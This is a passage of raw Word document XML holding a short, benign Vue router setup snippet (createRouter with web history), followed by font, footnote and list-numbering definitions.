        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67D36DC0" w14:textId="77777777" w:rsidR="00D91FD3" w:rsidRDefault="00D91FD3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const router = createRouter({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35264CAC" w14:textId="77777777" w:rsidR="00D91FD3" w:rsidRDefault="00D91FD3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    history: createWebHistory(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195827DF" w14:textId="77777777" w:rsidR="00D91FD3" w:rsidRDefault="00D91FD3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    routes: routes  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FE5121" w14:textId="77777777" w:rsidR="00D91FD3" w:rsidRDefault="00D91FD3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687B44E3" w14:textId="77777777" w:rsidR="00D91FD3" w:rsidRDefault="00D91FD3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B5220A3" w14:textId="5C0EB9DD" w:rsidR="00F5250B" w:rsidRDefault="00D91FD3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>export default router</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CEBACE" w14:textId="77777777" w:rsidR="00F5250B" w:rsidRDefault="00F5250B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E4076F8" w14:textId="77777777" w:rsidR="00F5250B" w:rsidRDefault="00F5250B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4601F39D" w14:textId="77777777" w:rsidR="00F5250B" w:rsidRDefault="00F5250B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="142F1B8E" w14:textId="77777777" w:rsidR="00F5250B" w:rsidRDefault="00F5250B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F5250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8F3727" w14:textId="77777777" w:rsidR="001253D9" w:rsidRDefault="001253D9" w:rsidP="00517778">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="64C0BB55" w14:textId="77777777" w:rsidR="001253D9" w:rsidRDefault="001253D9" w:rsidP="005177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JetBrains Mono">
    <w:altName w:val="黑体"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000003" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="??">
    <w:altName w:val="Calibri"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>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auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00040001"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Noto Serif">
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E00002FF" w:usb1="500078FF" w:usb2="00000029" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Inconsolata">
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A00000FF" w:usb1="0000F9EB" w:usb2="00000020" w:usb3="00000000" w:csb0="00000193" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="inheri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MS Gothic">
    <w:altName w:val="ＭＳ ゴシック"/>
    <w:panose1 w:val="020B0609070205080204"/>
    <w:charset w:val="80"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="E00002FF" w:usb1="6AC7FDFB" w:usb2="08000012" w:usb3="00000000" w:csb0="0002009F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="var(--code-font-family)">
    <w:altName w:val="Cambria"/>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FACCF4" w14:textId="77777777" w:rsidR="001253D9" w:rsidRDefault="001253D9" w:rsidP="00517778">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4A137F5F" w14:textId="77777777" w:rsidR="001253D9" w:rsidRDefault="001253D9" w:rsidP="0051777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9DC5B4F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="89DC5B4F"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="8D590823"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8D590823"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="BF69E42C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BF69E42C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="E2A06182"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E2A06182"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="E7F93F38"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E7F93F38"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="EC0D83BA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="EC0D83BA"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="F1954E22"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F1954E22"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="02AF239D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E820B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E403D8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="33581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4401F9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0818F89A"/>
    <w:lvl w:ilvl="0" w:tplc="B1B2671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07492DC7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C756B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E08E1A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="07E08E1A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="09873ADC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B3B25D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B64ABB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="58EE03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DB3A39"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DB6C7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E5E6C3B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A11AF9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F5555A9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="076C29EA"/>
    <w:lvl w:ilvl="0" w:tplc="1270D0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2867CEB"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="12867CEB"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="14D86835"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2B6A0D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5292FAF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="15292FAF"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="16BC5E84"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="58F04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D05FFC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04A20B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4A1E9A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2C32D9B8"/>
    <w:lvl w:ilvl="0" w:tplc="F15E32E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1868153B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="785E5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9406A7C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AB686832"/>
    <w:lvl w:ilvl="0" w:tplc="7CFEA6DA">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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="20312344"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="57DAB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4E87F69"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="897CD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B929684"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2B929684"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2E84444F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8A4AA4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F8F350D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B8482B12"/>
    <w:lvl w:ilvl="0" w:tplc="BB9A99B8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="570" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Wingdings" w:cstheme="minorBidi" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1090" w:hanging="440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1530" w:hanging="440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1970" w:hanging="440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2410" w:hanging="440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2850" w:hanging="440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3290" w:hanging="440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3730" w:hanging="440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4170" w:hanging="440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="330D3893"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="37263B1E"/>
    <w:lvl w:ilvl="0" w:tplc="EFDC71D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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="34613213"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="97B8F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5390BA3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B801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6A65214"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="36A65214"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="34" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="36B85E6F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2652865E"/>
    <w:lvl w:ilvl="0" w:tplc="3FB46D0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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="37DC36BE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B2668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8887AA3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="46E2C7D2"/>
    <w:lvl w:ilvl="0" w:tplc="EBD613A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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="39425003"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8C1474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AC5555B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="88B29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B3C1D1E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="62C47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DA51CD0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F796EBB2"/>
    <w:lvl w:ilvl="0" w:tplc="9E9E7E4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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="416A4022"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="411E9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33FAD35"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="433FAD35"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="43" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="44604FB3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="79F8C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4A22AD8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5772469C"/>
    <w:lvl w:ilvl="0" w:tplc="684ED21E">
      <w:start w:val="2"/>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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="453B2724"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B2505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5B31EF7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E780DCF4"/>
    <w:lvl w:ilvl="0" w:tplc="F1B0AD88">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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="45D0051F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="41DE73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88025B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="129AF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AC12224"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="91D070E8"/>
    <w:lvl w:ilvl="0" w:tplc="80A22B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4AD05F3C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5CE3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D707604"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9892B4BE"/>
    <w:lvl w:ilvl="0" w:tplc="C4A6A3C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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4D713CEC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C90A2402"/>
    <w:lvl w:ilvl="0" w:tplc="FCA4A18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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4DC83E40"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AFBA1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FC50399"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="061CC02C"/>
    <w:lvl w:ilvl="0" w:tplc="3934D19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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="522C2A16"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ED72AF72"/>
    <w:lvl w:ilvl="0" w:tplc="B27A78F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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="525337CA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="525337CA"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="57" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="52CD5771"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9BE08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342496C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E6165D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37F6639"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B352E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7576DC3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4072B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B6C7A4A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7E9450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BC67D82"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="91749492"/>
    <w:lvl w:ilvl="0" w:tplc="AE78C4E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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5D7D4DC7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="17183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5DC34570"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D3F872C4"/>
    <w:lvl w:ilvl="0" w:tplc="C1AED47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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6298215D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="465C9E56"/>
    <w:lvl w:ilvl="0" w:tplc="CA4AF3E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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="63173F71"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="35AEB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458563D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4DAA0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4EC6E2B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="525E5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5094C06"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8CFE6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62C0117"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00C28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7742A75"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2108AA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B7838A5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="95BA6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D4135DF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB840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2A156D0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7F183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762E22BE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C96EC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6D944EF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1354E752"/>
    <w:lvl w:ilvl="0" w:tplc="14DCC0B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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7D7D798C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0D50F98A"/>
    <w:lvl w:ilvl="0" w:tplc="9402B12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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7EC23375"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="12ACB3EA"/>
    <w:lvl w:ilvl="0" w:tplc="4FCE00F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397170641">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="326322432">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1587807955">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="760488675">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1310204362">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1336373755">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1242980512">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1029142983">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="5139139">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="43525499">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1071123492">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1281109899">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1476291990">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="309602875">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="812018873">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="957568309">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="543906223">
    <w:abstractNumId w:val="77"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="755250938">
    <w:abstractNumId w:val="72"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1319961269">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1237518444">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1183589580">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1210457463">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1928272432">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1480152001">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1840849801">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1164858712">
    <w:abstractNumId w:val="64"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1435906966">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1063332726">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1842886141">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="829249099">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="589777811">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1073356017">
    <w:abstractNumId w:val="76"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1134710614">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1550847712">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="494612069">
    <w:abstractNumId w:val="78"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1599485404">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="821654376">
    <w:abstractNumId w:val="68"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="1391535027">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="2081710338">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="358317248">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="1477263390">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="1695185557">
    <w:abstractNumId w:val="73"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="474301053">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="1493182714">
    <w:abstractNumId w:val="75"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="1218321591">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="976227258">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="1653101644">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="4479255">
    <w:abstractNumId w:val="71"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="838890487">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="1842041740">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="32118075">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="1486160724">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="1653758239">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="1563521815">
    <w:abstractNumId w:val="26"/>
  </w:num>
